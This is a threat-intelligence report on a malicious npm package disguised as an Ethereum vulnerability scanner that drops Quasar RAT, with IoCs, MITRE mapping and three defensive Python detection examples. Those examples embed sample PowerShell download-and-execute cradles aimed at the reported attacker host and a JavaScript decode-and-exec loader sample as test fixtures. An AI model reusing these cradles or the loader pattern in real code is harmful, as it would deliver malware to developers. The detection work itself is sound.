Full Report
Cybersecurity researchers have discovered a malicious package on the npm package registry that masquerades as a library for detecting vulnerabilities in Ethereum smart contracts but, in reality, drops an open-source remote access trojan called Quasar RAT onto developer systems. The heavily obfuscated package, named ethereumvulncontracthandler, was published to npm on December 18, 2024, by a user
Analysis Summary
# Tool/Technique: Quasar RAT deployed via Malicious npm Package
## Overview
A malicious npm package named `ethereumvulncontracthandler`, published by the npm account "solidit-dev-416," was used to deploy the open-source Remote Access Trojan (RAT) Quasar RAT onto developer systems. The package itself is a heavily obfuscated first-stage loader that downloads and executes the final payload.
## Technical Details
- Type: Malware (RAT) delivered via Supply Chain Attack (npm package)
- Platform: Windows (the PowerShell stage and the Quasar RAT payload run on Windows; the npm package itself installs on any platform, so non-Windows hosts still pull down the loader even if the payload never runs)
- Capabilities: Remote control, information gathering, persistence, C2 communication.
- First Seen: December 18, 2024 (npm package publication date)
## MITRE ATT&CK Mapping
- TA0002 - Execution
- T1204 - User Execution
- T1204.002 - Malicious File
- T1059 - Command and Scripting Interpreter
- T1059.001 - PowerShell
- TA0003 - Persistence
- T1547 - Boot or Logon Autostart Execution
- T1547.001 - Registry Run Keys / Startup Folder (implied; the source says only that persistence is achieved by modifying the Windows Registry and does not name the key)
- TA0011 - Command and Control
- T1071 - Application Layer Protocol
- T1071.001 - Web Protocols
- TA0010 - Exfiltration
- T1041 - Exfiltration Over C2 Channel
## Functionality
### Core Capabilities
- **Initial Access:** Abuses trust in the npm registry: the package poses as an Ethereum smart-contract vulnerability scanner, and a developer who installs it runs the attacker's code. No software vulnerability is exploited.
- **Obfuscation:** The malicious script is layered with Base64 encoding, XOR encoding, and minification to slow static analysis.
- **Loader Functionality:** The package is a first-stage loader: it retrieves the second-stage payload from the remote server `jujuju[.]lat` and executes it.
- **Execution Chain:** The loader runs PowerShell commands that carry out the Quasar RAT deployment.
### Advanced Features
- **Anti-Analysis:** Checks for signs of a sandbox or analysis environment before running, so detonation in an automated sandbox may show nothing.
- **Persistence:** Survives reboots on Windows by modifying the Windows Registry.
- **C2 Communication:** Connects to the command-and-control server (`captchacdn[.]com:7000`) for tasking, giving the operator full surveillance of and control over the compromised host.
## Indicators of Compromise
- File Hashes: not provided in the source.
- File Names: not provided in the source beyond the npm package name `ethereumvulncontracthandler`.
- Registry Keys: not provided; the source states only that persistence is achieved through Windows Registry modification.
- Network Indicators:
- Second-Stage Payload Server: `jujuju[.]lat`
- C2 Server: `captchacdn[.]com:7000`
- Behavioral Indicators:
- PowerShell launched from a Node.js/npm process during or shortly after installation of the package (on a developer workstation this is rarely legitimate).
- Modifications to the Windows Registry for persistence.
- Outbound connections to C2 infrastructure.
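The network indicators above, turned into a matcher over egress logs, as an added example that is not part of the original report. The log lines are constructed for the example, and the subdomain and off-port handling (a hit on `captchacdn[.]com` on a port other than 7000 is still reported, at lower confidence) are design choices here, not behaviour the source describes.

```python
import re

# Network IoCs as published in the report, in defanged form.
DEFANGED_IOCS = ["jujuju[.]lat", "captchacdn[.]com:7000"]


def refang(indicator: str) -> str:
    """Turn a defanged indicator ('[.]', 'hxxp') back into a matchable one."""
    return indicator.replace("[.]", ".").replace("hxxp", "http")


def parse_ioc(indicator: str):
    """Split 'host' or 'host:port' into (host, port or None), lower-cased."""
    host, _, port = refang(indicator).lower().partition(":")
    return host, (int(port) if port else None)


IOCS = [parse_ioc(i) for i in DEFANGED_IOCS]

# Egress log lines in a key=value style (constructed for this example; not real traffic).
LOG_LINES = [
    "ts=2024-12-19T10:01:02Z src=10.0.0.5 host=registry.npmjs.org dport=443 action=allow",
    "ts=2024-12-19T10:01:09Z src=10.0.0.5 host=jujuju.lat dport=443 action=allow",
    "ts=2024-12-19T10:01:15Z src=10.0.0.5 host=captchacdn.com dport=7000 action=allow",
    "ts=2024-12-19T10:01:20Z src=10.0.0.5 host=captchacdn.com dport=443 action=allow",
    "ts=2024-12-19T10:02:00Z src=10.0.0.7 host=cdn.jujuju.lat dport=80 action=allow",
]

FIELD_RE = re.compile(r"(\w+)=(\S+)")


def parse_line(line: str) -> dict:
    return dict(FIELD_RE.findall(line))


def matches_ioc(host: str, port: int):
    """Return (ioc, confidence) or None.

    A host matches when it equals the IoC host or is a subdomain of it (operators
    often rotate hostnames under one domain).  When the IoC carries a port, a hit on
    that port is 'high' confidence; the same host on another port is still reported,
    at 'medium', because the operator can move the listener.
    """
    host = host.lower().rstrip(".")
    for ioc_host, ioc_port in IOCS:
        if host == ioc_host or host.endswith("." + ioc_host):
            if ioc_port is None or ioc_port == port:
                return (f"{ioc_host}:{ioc_port}" if ioc_port else ioc_host), "high"
            return f"{ioc_host}:{ioc_port}", "medium"
    return None


def scan(lines):
    """Return one hit record per log line that touches the report's infrastructure."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        port = int(rec.get("dport", 0))
        match = matches_ioc(rec.get("host", ""), port)
        if match:
            ioc, confidence = match
            hits.append({"ts": rec["ts"], "src": rec["src"], "host": rec["host"],
                         "dport": port, "ioc": ioc, "confidence": confidence})
    return hits


if __name__ == "__main__":
    for hit in scan(LOG_LINES):
        print(hit)
```

Run against the constructed lines, four of the five records are reported: the registry traffic is ignored, the two exact hits come back as high confidence, the subdomain of `jujuju.lat` is caught, and `captchacdn.com` on 443 is surfaced at medium confidence rather than dropped.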
## Associated Threat Actors
- Quasar RAT is open source and has been used by many unrelated actors for both cybercrime and espionage, so the payload alone does not identify the operator.
- For this campaign the only attribution available is the npm publisher account "solidit-dev-416"; the source does not link it to a named group.
## Detection Methods
- **Signature-based detection:** Signatures for known Quasar RAT binaries and for its C2 traffic; because Quasar is open source, builds vary, so binary signatures should be paired with network and behavioral rules.
- **Behavioral detection:** Alert on PowerShell spawned by package-manager or Node.js processes, especially with encoded commands, hidden windows, or remote script retrieval, and on outbound connections from those processes to newly seen domains.
- **YARA rules:** Rules for the loader's obfuscation patterns (Base64/XOR decode routines feeding execution) and for Quasar RAT payload artifacts.
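The behavioral detection described above, as an added example that is not part of the original report: a scorer over Sysmon-style process-creation events that flags PowerShell spawned by node/npm, decodes `-EncodedCommand` payloads so the hidden script is inspected too, and looks for download-and-execute cradles. The events, the scoring weights, the alert threshold and the cradle pointing at `jujuju[.]lat` are constructed for this example; the source gives no command lines.

```python
import base64
import re

# Process-creation events in the shape of Sysmon Event ID 1 (constructed for this
# example; not real telemetry).  The -enc blob for the first event is built inline so
# that it is a genuine UTF-16LE/Base64 encoding of a download cradle pointing at the
# second-stage host named in the report.
_STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('https://jujuju.lat/')"
_ENCODED = base64.b64encode(_STAGE2.encode("utf-16le")).decode()
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

EVENTS = [
    {"ParentImage": r"C:\Program Files\nodejs\node.exe", "Image": _PS,
     "CommandLine": f"powershell.exe -nop -w hidden -enc {_ENCODED}"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": _PS,
     "CommandLine": "powershell.exe Get-Process"},
    {"ParentImage": r"C:\Program Files\nodejs\node.exe", "Image": _PS,
     "CommandLine": 'powershell.exe -NoProfile -Command "node --version"'},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "CommandLine": "pwsh -w hidden -nop -c \"IEX (IWR 'https://jujuju.lat/')\""},
]

POWERSHELL = ("powershell.exe", "pwsh.exe")
# Parents that mean "a package install or require-time script is running".
INSTALL_PARENTS = ("node.exe", "npm.cmd", "npx.cmd", "yarn.cmd", "pnpm.cmd")

# PowerShell accepts any unambiguous prefix of -EncodedCommand; cover the common ones.
ENC_RE = re.compile(r"(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
NOPROFILE_RE = re.compile(r"-nop(?:rofile)?\b", re.I)
CRADLE_RE = re.compile(
    r"\b(DownloadString|DownloadFile|Invoke-WebRequest|iwr|Net\.WebClient|"
    r"Invoke-Expression|iex|FromBase64String|Start-BitsTransfer)\b", re.I)
ALERT_THRESHOLD = 4  # assumed tuning value for this example


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """Recover the script behind -EncodedCommand (Base64 of UTF-16LE), or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le", errors="replace")
    except ValueError:
        return None


def score_event(ev: dict):
    """Weight the traits the report describes; the decoded -enc script is scanned too."""
    if basename(ev["Image"]) not in POWERSHELL:
        return 0, []
    score, reasons = 0, []
    cmd = ev["CommandLine"]
    if basename(ev["ParentImage"]) in INSTALL_PARENTS:
        score += 2
        reasons.append("powershell spawned by node/npm")
    if HIDDEN_RE.search(cmd):
        score += 1
        reasons.append("hidden window")
    if NOPROFILE_RE.search(cmd):
        score += 1
        reasons.append("profile suppressed")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        score += 2
        reasons.append("encoded command")
        cmd = cmd + " " + decoded  # analyse the decoded script as well
    cradles = sorted({c.lower() for c in CRADLE_RE.findall(cmd)})
    if cradles:
        score += 3
        reasons.append("download/execute cradle: " + ", ".join(cradles))
    return score, reasons


def triage(events, threshold=ALERT_THRESHOLD):
    """Return alert records for events scoring at or above the threshold."""
    alerts = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            alerts.append({"parent": basename(ev["ParentImage"]),
                           "score": score, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in triage(EVENTS):
        print(alert)
```

The third event (node spawning PowerShell for `node --version`) scores below the threshold on its own: a node parent is a strong signal but not conclusive, which is why the score combines it with the encoding, window and cradle traits rather than alerting on parentage alone. The decoded `-enc` payload is what exposes the cradle in the first event; without decoding, the command line shows nothing but an opaque blob.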
## Mitigation Strategies
- **Prevention Measures:** Scrutinize dependencies, especially from unknown or newly created publishers; check the package's age, publisher history, and whether the code matches its claimed purpose. Install with lifecycle scripts disabled (`ignore-scripts=true` in `.npmrc`, or `npm install --ignore-scripts`), noting that this stops install hooks but not code that runs when the package is later required.
- **Hardening Recommendations:** Constrain PowerShell with application control (WDAC or AppLocker) and Constrained Language Mode, enable script block logging, deploy EDR with behavioral rules, and isolate development environments where possible.
- **Supply Chain Security:** Validate the reputation and activity of open-source packages before integration, and do not treat superficial popularity metrics such as GitHub stars as a trust signal.
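A pre-install check that applies both the loader description under Functionality (Base64/XOR obfuscation feeding execution) and the dependency-scrutiny advice above, as an added example that is not part of the original report. It flags lifecycle hooks in `package.json`, flags decode-then-execute markers and long high-entropy string literals in the package's JavaScript, and checks whether `.npmrc` disables lifecycle scripts. The sample manifest and `index.js` are constructed to resemble the reported loader; the source does not reproduce the real package's files, and the entropy threshold and severity weights are assumptions of this example.

```python
import base64
import hashlib
import json
import math
import re
from collections import Counter

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")
# Shell-level tells in a lifecycle hook: interpreter launch, download tools, encoding.
HOOK_CMD_RE = re.compile(
    r"powershell|pwsh|cmd\.exe|\bcurl\b|\bwget\b|Invoke-WebRequest|-enc\b|base64|node\s+-e\b", re.I)
# JavaScript-level tells of a decode-then-execute loader.
LOADER_MARKERS = {
    "child_process": re.compile(r"\bchild_process\b"),
    "exec/spawn": re.compile(r"\b(?:exec|spawn)(?:Sync)?\s*\("),
    "eval": re.compile(r"\b(?:eval|Function)\s*\("),
    "base64 decode": re.compile(r"\batob\s*\(|['\"]base64['\"]"),
    "xor loop": re.compile(r"\^\s*\w+(?:\[|\.charCodeAt)"),
}
# Quoted string literals of 80+ characters: where encoded stages usually live.
LONG_STRING_RE = re.compile(r"""(["'`])((?:\\.|(?!\1).){80,})\1""", re.S)
SEVERITY = ["info", "medium", "high", "critical"]
ENTROPY_THRESHOLD = 5.0  # bits/char (assumed); readable JS sits well below, Base64 blobs above


def shannon_entropy(s: str) -> float:
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values()) if n else 0.0


def scan_manifest(manifest_text: str):
    """Flag lifecycle hooks; escalate when the hook command itself looks like a dropper."""
    pkg = json.loads(manifest_text)
    findings = []
    for hook, cmd in pkg.get("scripts", {}).items():
        if hook in LIFECYCLE_HOOKS:
            sev = "high" if HOOK_CMD_RE.search(cmd) else "medium"
            findings.append((sev, f"lifecycle hook {hook!r} runs: {cmd}"))
    return findings


def scan_source(js: str):
    """Flag loader markers and high-entropy literals; both together is the loader pattern."""
    findings = []
    markers = [name for name, rx in LOADER_MARKERS.items() if rx.search(js)]
    if markers:
        findings.append(("medium", "loader markers: " + ", ".join(markers)))
    blobs = False
    for m in LONG_STRING_RE.finditer(js):
        h = shannon_entropy(m.group(2))
        if h > ENTROPY_THRESHOLD:
            blobs = True
            findings.append(("high", f"high-entropy literal ({len(m.group(2))} chars, {h:.2f} bits/char)"))
    if markers and blobs:
        findings.append(("critical", "encoded blob feeding decode/execute code: likely loader"))
    return findings


def npmrc_runs_scripts(npmrc_text: str) -> bool:
    """True unless ignore-scripts=true is set (npm's setting that skips lifecycle hooks)."""
    for line in npmrc_text.splitlines():
        key, _, val = line.partition("=")
        if key.strip() == "ignore-scripts" and val.strip().lower() == "true":
            return False
    return True


def assess(manifest_text: str, sources: dict):
    """Combine manifest and source findings into (worst severity, findings)."""
    findings = scan_manifest(manifest_text)
    for name, js in sources.items():
        findings += [(sev, f"{name}: {msg}") for sev, msg in scan_source(js)]
    worst = max((SEVERITY.index(sev) for sev, _ in findings), default=0)
    return SEVERITY[worst], findings


# Sample package shaped like the reported loader (constructed; not the real package's
# files).  The blob is deterministic pseudo-random data standing in for an XOR+Base64
# encoded stage, so the entropy check sees what a real encoded payload looks like.
_BLOB = base64.b64encode(b"".join(hashlib.sha256(b"stage-%d" % i).digest() for i in range(10))).decode()
LOADER_JS = (
    'const cp=require("child_process");const b="' + _BLOB + '";const k="x";let s="";'
    'const d=Buffer.from(b,"base64");for(let i=0;i<d.length;i++){'
    's+=String.fromCharCode(d[i]^k.charCodeAt(i%k.length))}'
    'cp.execSync("powershell -nop -w hidden -enc "+Buffer.from(s,"utf16le").toString("base64"));'
)
SUSPICIOUS_MANIFEST = json.dumps({"name": "ethereumvulncontracthandler", "version": "1.0.0",
                                  "scripts": {"postinstall": "node index.js", "test": "echo ok"}})
CLEAN_MANIFEST = json.dumps({"name": "example-clean", "version": "1.0.0",
                             "scripts": {"test": "node test.js"}})

if __name__ == "__main__":
    verdict, findings = assess(SUSPICIOUS_MANIFEST, {"index.js": LOADER_JS})
    print(verdict)
    for sev, msg in findings:
        print(f"[{sev}] {msg[:100]}")
```

The manifest check alone only yields "medium" for a `postinstall` that runs `node index.js`, which is common in legitimate packages; the verdict becomes "critical" once the referenced source shows a high-entropy literal being decoded and handed to `child_process`. `npmrc_runs_scripts` is worth running in CI as well: `ignore-scripts=true` blocks the install hook, but the same loader would still run the moment the package is required, which is why the source scan is not optional.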
## Related Tools/Techniques
- **Quasar RAT:** The final payload, a well-known open-source RAT.
- **Supply Chain Compromise:** The primary initial access technique utilized via malicious npm packages.
- **Obfuscation Techniques:** Base64, XOR, and minification.